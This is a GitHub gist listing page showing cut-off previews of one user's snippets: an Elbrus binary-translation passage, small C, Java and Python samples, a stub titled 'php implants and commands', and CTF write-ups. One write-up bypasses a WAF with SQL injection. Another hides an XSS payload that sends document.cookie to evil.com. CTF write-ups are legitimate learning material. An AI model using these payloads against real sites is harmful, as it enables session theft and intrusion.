ngo
/ gist:ec83d04d04b676d8220266dbb25783bd
Created
August 21, 2019 05:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Были реализованы два подхода к построению системы двоичной транс-ляции. При первом из них она работает между микропроцессором и за-пускаемыми на нем x86-кодами, транслируя коды BIOS, операционной системы, драйверов и прикладных программ. Вычислительный комплекс на базе микропроцессора «Эльбрус» с системой полной двоичной транс-ляции для пользователя неотличим от вычислительного комплекса на базе x86-микропроцессоров. При втором подходе эта система является обычным Linux-приложением и работает под управлением ОС Linux. Она позволяет запускать Linux-приложения для платформы x86, которые могут работать одновременно с приложениями в кодах платформы «Эльбрус» | |
| Two approaches for building a binary translation system were implemented. In the first approach the system works between CPU and the x86 instructions that are being executed, translating the instructions of BIOS, OS, drivers and applications. For a user, the Elbrus-based appliance with full binary translation is indistinguishable from an x86 appliance. In t |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <pthread.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #define NUM_THREADS 5 | |
| void *PrintHello(void *threadid) | |
| { | |
| long tid; | |
| tid = (long)threadid; | |
| if (tid == 0){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.lang.reflect.InvocationTargetException; | |
| import java.lang.reflect.Method; | |
| import java.net.MalformedURLException; | |
| import java.net.URL; | |
| import java.net.URLClassLoader; | |
| public class Main { | |
| public static void main(String[] args) { | |
| try { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.lang.reflect.InvocationTargetException; | |
| import java.lang.reflect.Method; | |
| import java.net.MalformedURLException; | |
| import java.net.URL; | |
| import java.net.URLClassLoader; | |
| public class Main { | |
| public static void main(String[] args) { | |
| try { |
ngo
/ command_f3a628a4-ace0-4934-a7c1-ff7e6882e3d0.php
Last active
May 18, 2018 05:22
php implants and commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| srand(time()); | |
| class DomainFramer2 | |
| { | |
| private $_path_cands = Array(); | |
| private $_path_cands2 = Array(); | |
| private $_cscript_payload = ""; | |
| private $_current_cscript_path = ""; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import math | |
| from collections import defaultdict | |
| import sys | |
| def factors(n): | |
| result = [] | |
| for i in range(2,n+1): # test all integers between 2 and n | |
| s = 0 | |
| while n/i == math.floor(n/float(i)): # is n/i an integer? | |
| n = n/float(i) |
ngo
/ gist:b474e5364508c16935501071c7fc52cd
Created
November 28, 2016 21:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(document.domain); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| There was an XSD challenge, which nobody, as far as I know, solved in an intended way. We weren't quite sure that this was xsd, and found SQLi first. | |
| The vulnerable interface was parsing XML from POST requests to /tickets.php and its id parameter was vulnerable to sqli. We quickly understood that the WAF enforced the parameter length to be exactly 35 chars long, which was a nuisance. Fortunately, we found that changing host to foo.waf-bypass.com (from the intended choo-choo.waf-bypass.com) removed that restriction. All that was left was to bypass the syntax anomaly detection, which was quite easy. The final vector is as follows (db was postgres, so this uses a relatively new error-based box() vector with xml functions to quickly get all database): | |
| POST /tickets.php HTTP/1.1 | |
| Host: hui.phdays.com | |
| Content-Type: text/xml | |
| X-Requested-With: XMLHttpRequest | |
| Referer: http://choo-choo.phdays.com/index.php?search=%27%22%3E | |
| Content-Length: 174 | |
| Cookie: WAFBYPASS=5727e690-39f4-44f1-a271-c6edfc1b4336 | |
| Connection: keep-alive |
ngo
/ http_test.py
Last active
August 29, 2015 14:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from http_parser.parser import HttpParser as HttpParserC | |
| from http_parser.pyparser import HttpParser as HttpParserPy | |
| REQUEST = 'GET /hjs?m_mode=multipart&site=news®ion=US&lang=en-US&pagetype=contentb&&__r=1391585859471&post=%7B%22reqs%22%3A%5B%7B%22handler%22%3A%22cfg.maple_dali.handler.refresh%22%2C%22data%22%3A%7B%22maple%22%3A%7B%22module%22%3A%22p_30345826%22%2C%22ba%22%3A%7B%22_txnid%22%3A0%2C%22_mode%22%3A%22json%22%2C%22_id%22%3A%22p_30345826%22%2C%22_container%22%3A0%2C%22_action%22%3A%22show%22%2C%22_subAction%22%3A%22getButtons%22%2C%22noups%22%3A1%2C%22sec%22%3A%22td-strm-dr%22%2C%22layout%22%3A%22horizontal%22%2C%22title%22%3A%22Sign-in%20and%20we%27ll%20show%20you%20more%20like%20this%20in%20the%20future.%22%2C%22narrow%22%3A1%7D%7D%7D%2C%22txId%22%3A1%7D%5D%2C%22props%22%3A%7B%22dali%22%3A%7B%22crumb%22%3A%22q%2FSc0Cy2vZm%22%2C%22yuid%22%3A%22%22%2C%22loggedIn%22%3A%220%22%2C%22mLogin%22%3A0%7D%7D%7D HTTP/1.1\r\nHost: news.yahoo.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gec |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack. | |
| We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's): | |
| anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/> |